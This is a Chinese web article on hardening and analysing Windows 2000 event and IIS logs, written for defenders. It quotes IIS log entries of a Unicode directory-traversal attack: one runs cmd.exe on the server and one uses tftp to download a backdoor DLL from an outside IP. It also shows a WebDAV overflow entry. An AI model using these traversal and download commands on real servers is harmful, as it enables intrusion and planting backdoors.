分享
 
 
 

Windows日志文件的保护和分析

王朝system·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

Windows系统以它 的易用性倍受网管员的青睐,国内相当部分的大型网站都是用Windows 2000/XP系统建立的。Windows系统使用的人多了,研究它安全的人也多了。在此我要提醒一下网管们,虽然你补上了所有的安全补丁,但是谁又知道新的漏洞何时又会被发现呢?所以也应该做好系统日志的保护工作。

作为黑客,他们也是最关心系统日志的,一旦他们入侵成功,要做的第一件事就是删除你的日志文件,使你在被入侵后无法追踪黑客行为,以及检查黑客所做的操作行为。日志文件就像飞机中的“黑匣子”一样重要,因为里面保存着黑客入侵行为的所有罪证。

日志的移位与保护

Windows 2000的系统日志文件包括:应用程序日志、安全日志、系统日志、DNS服务日志,以及FTP连接日志和HTTPD日志等。在默认情况下日志文件大小为512KB,日志保存的默认的位置如下:

安全日志文件:%systemroot%system32config SecEvent.EVT

系统日志文件:%systemroot%system32config SysEvent.EVT

应用程序日志文件:%systemroot%system32config AppEvent.EVT

FTP连接日志和HTTPD事务日志:%systemroot% system32LogFiles,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。

在此笔者把系统默认为.EVT扩展名的日志文件统称为事件日志,笔者看了好多文章介绍对事件日志移位能做到很好的保护。移位虽是一种保护方法,但只要在命令行输入dir c:*.evt/s(如系统安装在D盘,则盘符为D),一下就可查找到事件日志位置。日志移位要通过修改注册表来完成,我们找到注册表HKEY_LOCAL_MACHINESYSTEM CurrentControlSet ServicesEventlog位置,下面的Application、Security、System几个子键,分别对应“应用程序日志”、“安全日志”、“系统日志”。如何修改注册表,下面我们来看看Application子键:

File项就是“应用程序日志”文件存放的位置,把此键值改为我们要存放日志文件的文件夹,然后再把%systemroot%system32configappevent.evt文件拷贝到此文件夹,再重启机器。在此介绍移位的目的是为了充分利用Windows 2000在NTFS格式下的“安全”属性,如果不移位也无法对文件进行安全设置操作,右击移位后的文件夹选择“属性”,进入“安全”选项卡,不选择“允许将来自父系的可继承权限传播给该对象”,添加“System”组,分别给Everyone组“读取”权限,System组选择除“完全控制”和“修改”的权限。然后再将系统默认的日志文件512KB大小改为你所想要的大小,如20MB。

进行了上面的设置后,再直接通过Del C:*.Evt/s/q来删除是删不掉的;对系统正在使用的记录文件在命令行形式中用上面的命令也是拒绝操作的。

日志文件的备份

基于WMI技术的日志备份脚本

WMI(Windows Management Instrumentation)技术是微软提供的Windows下的系统管理工具,基于WMI开发的脚本均可在Windows 2000/NT上成功运行。微软提供了一个脚本,利用WMI将日志文件大小设为25MB,并允许日志自动覆盖14天前的日志。

我们只需把该脚本保存为.vbs扩展名的文件就可以使用,我们还可以修改上面的脚本来备份日志文件,笔者在此建议,在备份日志时一定将EVT的后缀名改为其他后缀保存(如.C),目的是让攻击者不易找到。

通过dumpel工具的备份

可用微软Resource Kit工具箱中的dumpel.exe工具备份日志文件,其格式为:

dumpel -f file [-s \server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t] [-dx]

-s \server 输出远程计算机日志,如果是本地,这个可以省略。

-f filename 输出日志的位置和文件名。

-l log log 可选为System,Security,Application,可能还有别的如DNS等。

如要把目标服务器Server上的系统日志转存为Systemlog.log可以用如下格式:

dumpel \ server -l system -f Systemlog.log

如果利用计划任务还可以实现定期备份系统日志。

Microsoft的IIS 5自公布到现在,被黑客利用的漏洞是很多的,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我们备份日志的目的就是为了分析黑客入侵的行为,对于没有打好补丁包的系统被黑客成功入侵的日志记录分别对应如下。

unicode漏洞入侵日志记录

我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%system32LogFiles文件夹下,如图2所示是一个典型的Unicode漏洞入侵行为的日志记录,对于正常的Web访问,是通过80端口用GET命令获取Web数据,但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此洞。

如通过下面的编码查看目标机的目录文件:

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200

则日志中会记录下此访问行为:

2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir 200 -

然而我们的日志中记录的一清二楚,是来自192.168.0.1的攻击者查看我们的目录。而下面一行是向我们的机器传送后门程序的记录:

2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll

502 -

WebDavx3远程溢出日志记录

最近在黑客界有名的Wevdavx3漏洞是应用最广泛的,连打了最新SP3补丁的系统也不放过。如果系统遭受了此远程溢出的攻击行为,则日志记录如下所示:

2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK

/AAAAA……

就表示我们的Web服务受到了来自192.168.0.218的攻击,并锁定(即关闭)了WEB服务。后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。

上面都记录了入侵行为的IP地址,此IP地址并不能排除是攻击者使用了跳板,也就是说此IP很可能是“肉鸡”而不是攻击者的IP,但再查看其他日志文件,还是有可能追查出攻击者的位置。

不过笔者写到最后,还是想说一句,最好还是安装一个防火墙来记录和阻止黑客行为。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有